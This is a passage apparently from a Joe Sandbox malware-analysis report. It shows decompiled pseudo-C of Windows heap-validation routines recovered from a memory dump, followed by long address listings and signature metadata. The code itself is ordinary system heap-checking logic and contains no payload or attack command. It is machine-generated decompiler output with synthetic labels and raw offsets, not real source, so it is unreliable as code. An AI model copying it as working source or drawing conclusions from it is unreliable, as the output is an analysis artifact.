						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E055AB150();
						} else {
							E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E055AB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E055AB150();
								} else {
									E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E055AB150();
									} else {
										E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E055AB150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E0565FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E055AB150();
										} else {
											E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E055FD540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E055AB150();
								} else {
									E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E0566A80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E055CE12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E0566A80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E055CE4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E055CA229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E055CA309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E055CBC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E056523E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E055A1F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}



































































                                                                        0x05664af7
                                                                        0x05664afb
                                                                        0x05664afd
                                                                        0x05664b01
                                                                        0x05664b03
                                                                        0x05664b08
                                                                        0x05664b0a
                                                                        0x05664b0f
                                                                        0x05664eb5
                                                                        0x05664eb5
                                                                        0x05664ebb
                                                                        0x056650d5
                                                                        0x056650d8
                                                                        0x05664ff6
                                                                        0x00000000
                                                                        0x05664ff6
                                                                        0x056650de
                                                                        0x056650e4
                                                                        0x056650e8
                                                                        0x05665107
                                                                        0x0566510c
                                                                        0x056650ea
                                                                        0x056650ff
                                                                        0x05665104
                                                                        0x05665112
                                                                        0x05665115
                                                                        0x05665118
                                                                        0x05665119
                                                                        0x056650cb
                                                                        0x056650cb
                                                                        0x056650af
                                                                        0x00000000
                                                                        0x056650af
                                                                        0x05664ecb
                                                                        0x056650b6
                                                                        0x056650bb
                                                                        0x05664ed1
                                                                        0x05664ee6
                                                                        0x05664eeb
                                                                        0x056650c1
                                                                        0x056650c2
                                                                        0x056650c5
                                                                        0x056650c6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05664b15
                                                                        0x05664b15
                                                                        0x05664b1c
                                                                        0x05664b1e
                                                                        0x05664b23
                                                                        0x05664b27
                                                                        0x05664b33
                                                                        0x05664b38
                                                                        0x05664b3a
                                                                        0x05664b3c
                                                                        0x05664b41
                                                                        0x05664b41
                                                                        0x05664b3a
                                                                        0x05664b52
                                                                        0x05665045
                                                                        0x0566504b
                                                                        0x0566504f
                                                                        0x0566506e
                                                                        0x05665073
                                                                        0x05665051
                                                                        0x05665066
                                                                        0x0566506b
                                                                        0x05665083
                                                                        0x05665088
                                                                        0x05665088
                                                                        0x0566508a
                                                                        0x05665091
                                                                        0x05665099
                                                                        0x05665099
                                                                        0x0566509d
                                                                        0x056650a7
                                                                        0x056650ad
                                                                        0x056650ad
                                                                        0x056650ad
                                                                        0x00000000
                                                                        0x0566509d
                                                                        0x05664b58
                                                                        0x05664b5b
                                                                        0x05664b5e
                                                                        0x05664b63
                                                                        0x05664b66
                                                                        0x05664b69
                                                                        0x05664b6f
                                                                        0x05664be4
                                                                        0x05664bf0
                                                                        0x05664bf2
                                                                        0x05664bf5
                                                                        0x05664dc3
                                                                        0x05664dc6
                                                                        0x05664dc9
                                                                        0x05664dce
                                                                        0x05664dce
                                                                        0x05664dd0
                                                                        0x05664dd0
                                                                        0x05664dd5
                                                                        0x05664def
                                                                        0x05664dd7
                                                                        0x05664de7
                                                                        0x05664de7
                                                                        0x05664df3
                                                                        0x05665001
                                                                        0x05665007
                                                                        0x0566500b
                                                                        0x0566502a
                                                                        0x0566502f
                                                                        0x0566500d
                                                                        0x05665022
                                                                        0x05665027
                                                                        0x05665039
                                                                        0x0566503a
                                                                        0x0566503b
                                                                        0x00000000
                                                                        0x05664df9
                                                                        0x05664dfd
                                                                        0x05664e90
                                                                        0x05664e94
                                                                        0x05664e9e
                                                                        0x05664ea4
                                                                        0x05664ea4
                                                                        0x05664ea4
                                                                        0x05664ea6
                                                                        0x05664ea6
                                                                        0x00000000
                                                                        0x05664ea6
                                                                        0x05664e03
                                                                        0x05664e08
                                                                        0x05664f88
                                                                        0x05664f92
                                                                        0x05664f99
                                                                        0x05664f9c
                                                                        0x05664fe0
                                                                        0x05664fe4
                                                                        0x05664fee
                                                                        0x05664ff4
                                                                        0x05664ff4
                                                                        0x05664ff4
                                                                        0x00000000
                                                                        0x05664fe4
                                                                        0x05664f9e
                                                                        0x05664fa4
                                                                        0x05664fa8
                                                                        0x05664fc7
                                                                        0x05664fcc
                                                                        0x05664faa
                                                                        0x05664fbf
                                                                        0x05664fc4
                                                                        0x05664fd2
                                                                        0x05664fd5
                                                                        0x05664fd6
                                                                        0x05664f34
                                                                        0x05664f34
                                                                        0x00000000
                                                                        0x05664f39
                                                                        0x05664e0e
                                                                        0x05664e14
                                                                        0x05664e1b
                                                                        0x05664e25
                                                                        0x05664e2b
                                                                        0x05664e2b
                                                                        0x05664e33
                                                                        0x05664e38
                                                                        0x05664e8a
                                                                        0x05664e8a
                                                                        0x00000000
                                                                        0x05664e3a
                                                                        0x05664e3e
                                                                        0x05664e43
                                                                        0x05664e47
                                                                        0x05664e53
                                                                        0x05664e58
                                                                        0x05664e5a
                                                                        0x05664e5c
                                                                        0x05664e61
                                                                        0x05664e61
                                                                        0x05664e5a
                                                                        0x05664e6e
                                                                        0x05664f41
                                                                        0x05664f47
                                                                        0x05664f4b
                                                                        0x05664f6a
                                                                        0x05664f6f
                                                                        0x05664f4d
                                                                        0x05664f62
                                                                        0x05664f67
                                                                        0x05664f7f
                                                                        0x05664f80
                                                                        0x05664f81
                                                                        0x00000000
                                                                        0x05664e74
                                                                        0x05664e78
                                                                        0x05664e82
                                                                        0x05664e88
                                                                        0x05664e88
                                                                        0x00000000
                                                                        0x05664e78
                                                                        0x05664e6e
                                                                        0x05664e38
                                                                        0x05664df3
                                                                        0x05664bfe
                                                                        0x05664c01
                                                                        0x05664c04
                                                                        0x05664c07
                                                                        0x05664c09
                                                                        0x05664c0c
                                                                        0x05664c0e
                                                                        0x05664c0e
                                                                        0x05664c11
                                                                        0x05664c11
                                                                        0x05664c0c
                                                                        0x05664c14
                                                                        0x05664c17
                                                                        0x05664dae
                                                                        0x05664db2
                                                                        0x05664db7
                                                                        0x05664dba
                                                                        0x05664dbd
                                                                        0x05664ef1
                                                                        0x05664ef7
                                                                        0x05664efb
                                                                        0x05664f1a
                                                                        0x05664f1f
                                                                        0x05664efd
                                                                        0x05664f12
                                                                        0x05664f17
                                                                        0x05664f2b
                                                                        0x05664f2b
                                                                        0x05664f2d
                                                                        0x05664f2e
                                                                        0x05664f2f
                                                                        0x00000000
                                                                        0x05664f2f
                                                                        0x00000000
                                                                        0x05664c1d
                                                                        0x05664c1d
                                                                        0x05664c20
                                                                        0x05664c23
                                                                        0x05664c26
                                                                        0x05664c29
                                                                        0x05664c2c
                                                                        0x05664c2e
                                                                        0x05664d91
                                                                        0x05664d91
                                                                        0x05664d92
                                                                        0x05664d97
                                                                        0x05664d9e
                                                                        0x00000000
                                                                        0x05664d9e
                                                                        0x05664c34
                                                                        0x05664c37
                                                                        0x05664c39
                                                                        0x05664c3c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05664c45
                                                                        0x05664c48
                                                                        0x05664c4e
                                                                        0x05664c50
                                                                        0x05664c78
                                                                        0x05664c78
                                                                        0x05664c7b
                                                                        0x05664c7d
                                                                        0x05664c80
                                                                        0x05664c84
                                                                        0x05664cad
                                                                        0x05664cad
                                                                        0x05664cb0
                                                                        0x05664cb8
                                                                        0x05664cbb
                                                                        0x05664cbe
                                                                        0x05664cc1
                                                                        0x05664cc7
                                                                        0x05664cdc
                                                                        0x05664cc9
                                                                        0x05664cd2
                                                                        0x05664cd4
                                                                        0x05664cd4
                                                                        0x05664cde
                                                                        0x05664ce0
                                                                        0x05664d13
                                                                        0x05664d13
                                                                        0x05664d16
                                                                        0x05664d18
                                                                        0x05664d29
                                                                        0x05664d2a
                                                                        0x05664d2c
                                                                        0x05664d34
                                                                        0x05664d1a
                                                                        0x05664d1a
                                                                        0x05664d1a
                                                                        0x05664d1d
                                                                        0x05664d1f
                                                                        0x05664d22
                                                                        0x05664d24
                                                                        0x05664d24
                                                                        0x05664d3c
                                                                        0x05664d3f
                                                                        0x05664d45
                                                                        0x05664d47
                                                                        0x05664d6c
                                                                        0x05664d6c
                                                                        0x05664d70
                                                                        0x05664d7e
                                                                        0x05664d84
                                                                        0x05664d84
                                                                        0x00000000
                                                                        0x05664d49
                                                                        0x05664d49
                                                                        0x05664d56
                                                                        0x05664d56
                                                                        0x05664d59
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05664d4e
                                                                        0x05664d50
                                                                        0x05664d52
                                                                        0x05664d8e
                                                                        0x05664d5d
                                                                        0x05664d5f
                                                                        0x05664d67
                                                                        0x00000000
                                                                        0x05664d67
                                                                        0x05664d54
                                                                        0x05664d54
                                                                        0x05664d5b
                                                                        0x00000000
                                                                        0x05664d5b
                                                                        0x05664ce2
                                                                        0x05664ce2
                                                                        0x05664ce5
                                                                        0x05664ce5
                                                                        0x05664ce7
                                                                        0x05664cfb
                                                                        0x05664ce9
                                                                        0x05664ce9
                                                                        0x05664cec
                                                                        0x05664cef
                                                                        0x05664cf1
                                                                        0x05664cf3
                                                                        0x05664cf3
                                                                        0x05664cf3
                                                                        0x05664cf6
                                                                        0x05664cf6
                                                                        0x05664d02
                                                                        0x05664d05
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05664d07
                                                                        0x05664d0f
                                                                        0x05664d11
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05664d11
                                                                        0x00000000
                                                                        0x05664ce5
                                                                        0x05664ce0
                                                                        0x05664c8a
                                                                        0x05664c8f
                                                                        0x05664c91
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05664c9d
                                                                        0x00000000
                                                                        0x05664c9d
                                                                        0x05664c52
                                                                        0x05664c5f
                                                                        0x05664c5f
                                                                        0x05664c62
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05664c57
                                                                        0x05664c59
                                                                        0x05664c5b
                                                                        0x05664caa
                                                                        0x05664c66
                                                                        0x05664c68
                                                                        0x05664c70
                                                                        0x05664c75
                                                                        0x00000000
                                                                        0x05664c75
                                                                        0x05664c5d
                                                                        0x05664c5d
                                                                        0x05664c64
                                                                        0x00000000
                                                                        0x05664c64
                                                                        0x05664c17
                                                                        0x05664b75
                                                                        0x05664bc4
                                                                        0x05664bc8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05664bd9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05664b77
                                                                        0x05664b7a
                                                                        0x05664b8c
                                                                        0x05664b7c
                                                                        0x05664b7e
                                                                        0x05664b83
                                                                        0x05664b86
                                                                        0x05664b86
                                                                        0x05664b90
                                                                        0x05664b93
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05664b95
                                                                        0x05664bab
                                                                        0x05664bb0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05664bb2
                                                                        0x05664bb9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05664bbb
                                                                        0x05664bbe
                                                                        0x05664bc1
                                                                        0x05664bc1
                                                                        0x00000000
                                                                        0x05664bc1
                                                                        0x05664b97
                                                                        0x05664ba4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x05664ba6
                                                                        0x00000000
                                                                        0x05664ba6
                                                                        0x05664ea9
                                                                        0x05664ea9
                                                                        0x05664eb2
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505918574.0000000005580000.00000040.00000800.00020000.00000000.sdmp, Offset: 05580000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_5580000_cvtres.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                        • API String ID: 0-3591852110
                                                                        • Opcode ID: cb2fa099e78ac191f1803056fb6de0de0fc9ff25919b0d4a7cec1a23ce31dc89
                                                                        • Instruction ID: 91fdd22caf39b4af6634e7528b1e3fa428b5db673f81c62af9204d0934ebb627
                                                                        • Opcode Fuzzy Hash: cb2fa099e78ac191f1803056fb6de0de0fc9ff25919b0d4a7cec1a23ce31dc89
                                                                        • Instruction Fuzzy Hash: 9412DD30604642DFDB29DF69C495BBABBF2FF48311F148559E8868BB41DB35E881CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05664496 Relevance: 10.4, Strings: 8, Instructions: 417COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 56%
                                                                        			E05664496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E056649A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0x5696378 = _t267;
						asm("int3");
						 *0x5696378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E055D174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E055AB150();
							} else {
								E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E055AB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E055AB150();
							} else {
								E055AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E055AB150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0x5696350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E055E9660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E055D174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
